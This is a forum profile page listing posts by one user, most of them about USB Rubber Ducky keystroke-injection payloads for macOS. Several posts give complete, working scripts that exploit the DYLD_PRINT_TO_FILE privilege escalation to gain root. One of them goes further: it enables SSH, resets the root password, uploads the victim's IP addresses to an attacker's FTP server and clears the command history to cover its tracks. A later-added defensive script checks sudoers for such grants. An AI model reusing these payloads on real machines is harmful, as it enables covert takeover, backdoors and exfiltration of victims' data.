V3sth4cks153

Active Members, 57 posts
Everything posted by V3sth4cks153

  1. It is indeed! I personally also prefer nano, but then I saw this text in the sudoers file which convinced me there must be a reason why Apple says to use visudo:

     # sudoers file.
     #
     # This file MUST be edited with the 'visudo' command as root.
     # Failure to use 'visudo' may result in syntax or file permission errors
     # that prevent sudo from running.
     #

     I also think Apple will likely be slow at patching this. But by searching for "DYLD_PRINT_TO_FILE post module" on Google, I found this, which pretty much means that if an attacker has user-level control of your Mac already, he can use this module to take full control of the machine, even without physical access! But since it's already been 5 days since this has been discovered, I find it really unlikely that Apple will release a patch.
  2. Hi everyone! Following my previous post on an adaptation of the recently discovered DYLD_PRINT_TO_FILE privilege escalation vulnerability, I decided to create a full use of this adaptation. This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac. The payload then activates the ssh daemon, changes the root password to anything you want, and uploads a text file containing both the internal and external IP addresses of the victim to an ftp server of your choice. The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app. The attacker can then SSH or SFTP to the victim machine using the modified root password and the IP address in the text file.

     /!\ MAKE SURE TO REPLACE THE FTP SERVER ADDRESS, USERNAME AND PASSWORD, AS WELL AS THE NEW ROOT PASSWORD WITH WHAT YOU WANT THEM TO BE! /!\

     I hope you like it!

     ********************* USE THIS PAYLOAD AT YOUR OWN RISK! *********************

     Here is the code (also on my GitHub):

     REM Author: V3sth4cks153
     REM Title: OS X DYLD_PRINT_TO_FILE Root SSH Backdoor
     REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac.
     REM The payload then activates the ssh daemon, changes the root password to anything you want, and uploads a text file containing both the internal and external IP addresses of the victim to an ftp server of your choice.
     REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app.
     REM
     REM /!\ MAKE SURE TO REPLACE THE FTP SERVER ADDRESS, USERNAME AND PASSWORD, AS WELL AS THE NEW ROOT PASSWORD WITH WHAT YOU WANT THEM TO BE! /!\
     REM
     REM ********************* USE THIS AT YOUR OWN RISK *********************
     REM
     REM --------------- OPEN TERMINAL ---------------
     DELAY 3000
     GUI SPACE
     DELAY 100
     STRING Terminal
     DELAY 500
     ENTER
     DELAY 1000
     REM --------------- GO TO HOME DIRECTORY ---------------
     STRING cd
     ENTER
     DELAY 100
     REM --------------- ESCALATE PRIVS ---------------
     STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
     ENTER
     REM --------------- GET IP AND UPLOAD TO FTP ---------------
     DELAY 200
     STRING curl -s checkip.dyndns.org | sed -e 's/.*Current IP Address: //' -e 's/<.*$//' > ip.txt
     ENTER
     DELAY 1200
     STRING ifconfig |grep inet >> ip.txt
     ENTER
     DELAY 500
     STRING ftp SERVER_ADDRESS
     ENTER
     DELAY 500
     STRING USERNAME
     ENTER
     DELAY 200
     STRING PASSWORD
     ENTER
     DELAY 1000
     STRING put ip.txt
     ENTER
     DELAY 1000
     STRING exit
     ENTER
     DELAY 500
     STRING rm ip.txt
     ENTER
     REM --------------- ENABLE SSH ---------------
     STRING systemsetup -f -setremotelogin on
     ENTER
     REM --------------- CHANGE ROOT PASSWORD ---------------
     STRING passwd
     ENTER
     STRING NEW_ROOT_PASSWORD
     ENTER
     DELAY 500
     STRING NEW_ROOT_PASSWORD
     ENTER
     DELAY 1500
     REM --------------- CLEANUP ---------------
     STRING cd
     ENTER
     STRING visudo -f /etc/sudoers
     ENTER
     DELAY 500
     STRING :$d
     ENTER
     STRING :w
     ENTER
     STRING :x
     ENTER
     STRING history -c
     ENTER
     DELAY 100
     STRING exit
     ENTER
     STRING history -c
     ENTER
     GUI q
  3. Thanks! I'm glad you like it! You're right about the cleanup operation. The only problem I had is you can't edit the sudoers file with any editor other than visudo, which is basically VIM. I just found out today that by using the ":$d" command in visudo you could delete the last line. It is better in every way as the payload is then smaller, so faster! I'm currently working on an application of this exploit, which uploads a text file containing the ip of the victim, and then changes the root password to anything you want so that you can ssh/sftp to the victim! I'll post it on the forums when it's done. DONE! As for Apple, like it's said in the article, they generally don't patch current versions of their OS, but they include a fix in the next version instead. Which I hope they won't do this time since this is far more dangerous than just making your iPhone reboot!

     Here is the modified code (it's also on my GitHub):

     REM Author: V3sth4cks153
     REM Title: DYLD_PRINT_TO_FILE Privilege Escalation + cleanup
     REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac.
     REM This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between.
     REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app.
     REM
     REM ********************* USE THIS AT YOUR OWN RISK *********************
     REM
     REM --------------- OPEN TERMINAL ---------------
     GUI SPACE
     DELAY 100
     STRING Terminal
     DELAY 500
     ENTER
     DELAY 1000
     REM --------------- GO TO HOME DIRECTORY ---------------
     STRING cd
     ENTER
     DELAY 100
     REM --------------- ESCALATE PRIVS ---------------
     STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
     ENTER
     REM * *
     REM ********************* YOU CAN PUT ANYTHING YOU WANT ROOT TO DO HERE *********************
     REM * *
     REM --------------- CLEANUP ---------------
     STRING cd
     ENTER
     STRING visudo -f /etc/sudoers
     ENTER
     DELAY 500
     STRING :$d
     ENTER
     STRING :w
     ENTER
     STRING :x
     ENTER
     STRING history -c
     ENTER
     DELAY 100
     STRING exit
     ENTER
     STRING history -c
     ENTER
     GUI q
  4. I don't know if this makes sense, but maybe he's talking about Dynamic DNS like No-IP or DynDNS? To make it so that you can see the feed from anywhere.
  5. Did you add delays in your payload? If not, do so. If you did, try increasing them, or using the DEFAULT_DELAY command. I hope this helps you! V3sth4cks153.
  6. Hi everyone! I just saw this on thehackernews.com, and I thought I'd make a Rubber Ducky Payload for it. This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac. This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between. The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app. I've successfully tested this on an Early 2013 MacBook Pro Retina 15'' running OS X 10.10.3 Yosemite.

     NOTE: Since the payload uses the username of the victim, I had to make it delete a bit more than the exact length of the added text in the sudoers file (the exploit command adds this to the sudoers file, located at /etc/sudoers: "username ALL=(ALL) NOPASSWD:ALL"). This shouldn't be a problem because the last few lines are commented out. Also, having a super, super long username, like 30ish characters (which I don't even know if it's possible), can be a problem. If ever you need it, here is the default sudoers file for Mac OS X 10.10 Yosemite.

     Hope you like it!

     ********************* USE THIS PAYLOAD AT YOUR OWN RISK! *********************

     Here is the code:

     REM Author: V3sth4cks153
     REM Title: DYLD_PRINT_TO_FILE Privilege Escalation + cleanup
     REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac.
     REM This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between.
     REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app.
     REM
     REM ********************* USE THIS AT YOUR OWN RISK *********************
     REM
     REM --------------- OPEN TERMINAL ---------------
     GUI SPACE
     DELAY 100
     STRING Terminal
     DELAY 500
     ENTER
     DELAY 1000
     REM --------------- GO TO HOME DIRECTORY ---------------
     STRING cd
     ENTER
     DELAY 100
     REM --------------- ESCALATE PRIVS ---------------
     STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
     ENTER
     REM * *
     REM ********************* YOU CAN PUT ANYTHING YOU WANT ROOT TO DO HERE *********************
     REM * *
     REM --------------- CLEANUP ---------------
     STRING cd
     ENTER
     STRING visudo -f /etc/sudoers
     ENTER
     DOWNARROW
     REPEAT 50
     RIGHTARROW
     REPEAT 40
     STRING i
     RIGHTARROW
     BACKSPACE
     REPEAT 35
     ESC
     STRING :w
     ENTER
     STRING :x
     ENTER
     STRING history -c
     ENTER
     DELAY 100
     STRING exit
     ENTER
     STRING history -c
     ENTER
     GUI q
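A defender-side check for the sudoers change these payloads make, added here as an example and not part of the forum posts: it lists any active passwordless sudo grant and flags a file that a sloppy cleanup (like the keystroke-counted one above) left malformed. The sample sudoers content and the "victim" user name are constructed.

```shell
#!/bin/sh
# Added example (not from the forum posts): audit a sudoers file for the kind of
# "<user> ALL=(ALL) NOPASSWD:ALL" grant the DYLD_PRINT_TO_FILE payload appends,
# and sanity-check that a hand-edited file still parses, since a broken sudoers
# locks sudo out. Point it at /etc/sudoers or /etc/sudoers.d/* on a real host.

# Print every active (non-comment) line granting passwordless sudo.
# Returns 0 if nothing was found, 1 otherwise.
audit_sudoers() {
    hits=$(grep -n 'NOPASSWD' "$1" 2>/dev/null | grep -Ev '^[0-9]+:[[:space:]]*#' || true)
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# Crude structural check: every active line must look like a Defaults, alias,
# @include or "who where=(as_whom) what" entry. Leftover junk from a partial
# cleanup (e.g. a dangling "ALL") matches none of these. On a live system the
# authoritative check is "visudo -c -f FILE" run as root, which also enforces
# root ownership and mode 0440.
check_sudoers_syntax() {
    if grep -Ev '^[[:space:]]*(#|$)' "$1" | grep -Eqv '(^Defaults|_Alias[[:space:]]|^@include|=)'; then
        return 1
    fi
    return 0
}

# Constructed sample: a default-looking sudoers with the injected line appended.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
# sudoers file.
# This file MUST be edited with the 'visudo' command as root.
Defaults env_reset
root ALL=(ALL) ALL
%admin ALL=(ALL) ALL
# %wheel ALL=(ALL) NOPASSWD: ALL
victim ALL=(ALL) NOPASSWD:ALL
EOF

audit_sudoers "$SAMPLE" || echo "WARNING: passwordless sudo grant(s) listed above"
check_sudoers_syntax "$SAMPLE" && echo "structure ok" || echo "WARNING: malformed sudoers line(s)"
rm -f "$SAMPLE"
```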
  7. You're right, it is, but only as a hex file, and if I'm not mistaken, the .hex file is a compiled file, ready to be flashed onto the Ducky, and it looks like shamwow is actually looking for the source code of that particular firmware.
  8. I think that's what you're looking for: https://github.com/midnitesnake/USB-Rubber-Ducky/tree/master/Firmware/Images
  9. Once you've got your payload in a text file, you need to use the Duck Encoder to encode it. Then you have to place the inject.bin file (the encoded file) on the root of the Duck's Micro SD card. You can encode the file directly on your computer using the encoder.jar located here: https://github.com/midnitesnake/USB-Rubber-Ducky, or you use the online encoder: http://www.ducktoolkit.com/Encoder.jsp I hope this helps!
  10. Hi everyone! I wrote a simple and fast Ducky script that changes the wallpaper to any image you want from the Internet (read the REMs in the code for more information). You just have to replace the URL and file name in the script, and you're good to go! (The link I put there is a cool hi-res matrix wallpaper.) You may have to change the delays a bit if you've got a slow computer or a slow internet connection. I've successfully tested this on an Early 2013 MacBook Pro Retina 15'' running OS X 10.10 Yosemite. Please let me know if this script works for you and if you find any errors or any improvements that could be made.

     Here is the code:

     REM Author: V3sth4cks153
     REM Title: OS X Wallpaper changer
     REM This script uses curl and osascript, which are both by default on Mac OS X, to download an image from the Internet, set it as wallpaper, and then delete the downloaded file and the Terminal history.
     REM NOTE: You may have to change the delays a bit if you have a slow computer or a slow internet connection
     DELAY 3000
     REM --------------- OPEN TERMINAL ---------------
     GUI SPACE
     STRING Terminal
     DELAY 500
     ENTER
     DELAY 1000
     REM --------------- GO TO HOME DIRECTORY ---------------
     STRING cd
     ENTER
     DELAY 100
     REM --------------- DOWNLOAD ---------------
     STRING curl -O http://img1.gtsstatic.com/wallpapers/3fea1154de2c3c2fe6a325c56618c5f2_large.jpeg
     ENTER
     DELAY 1500
     REM --------------- COPY TO DESKTOP ---------------
     STRING cp 3fea1154de2c3c2fe6a325c56618c5f2_large.jpeg Desktop/
     ENTER
     REM --------------- CHANGE DESKTOP ---------------
     DELAY 200
     STRING osascript << EOF
     ENTER
     STRING tell application "Finder"
     ENTER
     STRING set desktop picture to file "3fea1154de2c3c2fe6a325c56618c5f2_large.jpeg" of desktop
     ENTER
     STRING end tell
     ENTER
     STRING EOF
     ENTER
     DELAY 100
     REM --------------- CLEANUP ---------------
     STRING rm 3fea1154de2c3c2fe6a325c56618c5f2_large.jpeg
     ENTER
     STRING cd Desktop/
     ENTER
     STRING rm 3fea1154de2c3c2fe6a325c56618c5f2_large.jpeg
     ENTER
     DELAY 100
     STRING cd
     ENTER
     DELAY 50
     STRING history -c
     ENTER
     GUI w
     DELAY 100
     GUI q
  11. Hello everyone! I just got my ducky and just created my first payload. It's a covert youtube blaster based on Cody Theodore's OSX Youtube Blast from the payload wiki, but with a few improvements such as hiding the Safari window and quitting the Terminal app for cleanup. I've only tested this payload on Mac OSX 10.10 Yosemite computers, but it should work on lower versions.

     Here is the code:

     REM Author: V3sth4cks153
     REM Title: OS X Covert Youtube Blaster
     REM This payload is based on Cody Theodore's OSX Youtube Blast from the payload wiki, but I made a few improvements such as hiding the Safari window and quitting the Terminal app for cleanup
     REM ---------------Open Terminal via Spotlight---------------
     DELAY 3000
     GUI SPACE
     DELAY 500
     STRING Terminal
     DELAY 750
     ENTER
     DELAY 1000
     REM ---------------Set the volume to maximum---------------
     STRING osascript -e 'set volume 10'
     DELAY 200
     ENTER
     DELAY 200
     REM ---------------Open youtube link in the default web browser---------------
     STRING open
     DELAY 500
     ENTER
     DELAY 750
     REM ---------------Hide the Safari window---------------
     GUI h
     DELAY 750
     REM ---------------Quit the Terminal---------------
     GUI q

     Please let me know if this payload works for you, and if you spot any errors that could be corrected or improvements that could be made! V3sth4cks153.
  12. I have this exact one and it works. I use it for wardriving.
  13. Ok! I tried it with running persistence, and it worked flawlessly! I'm going to try it with multiple commands when I get the time...
  14. I googled that a while ago and it seems like you can, and that it's even been implemented in Metasploit: https://offensiveinfosec.wordpress.com/tag/autorunscript/ Just have to change the commands in the rc file to the ones you want and it should work. I didn't test it though...
  15. The Hyperlinks are cut in two... Try copying and pasting the links instead. This worked for me.
  16. It unlocks at the "Hackling" level
  17. You're supposed to enter whatever you want. The WPA2 secure setup is just to control the pineapple over wifi. It's only for customization purposes as far as I know. Don't worry, it's not a test.
  18. Ok so I've tested this a few times, and it seems like kismet_server doesn't fail cleanly if the power is cut. However, I found that if I ssh in and kill the service with this command: kill -15 <pid> kismet_server quits cleanly, and I can then cut the power. Also, using the GPS in serial is perfect, and far easier than GPSD. Thanks barry99705 and Sebkinne for your help! Problem solved! EDIT: Just came back from a test run, and it seems like I can't kill the process after some time, even though I run the command... Any ideas why that might happen?
  19. Can you try it without "gufw"? Just like that: "apt-get -f install". If that doesn't work, I really don't know what the problem is...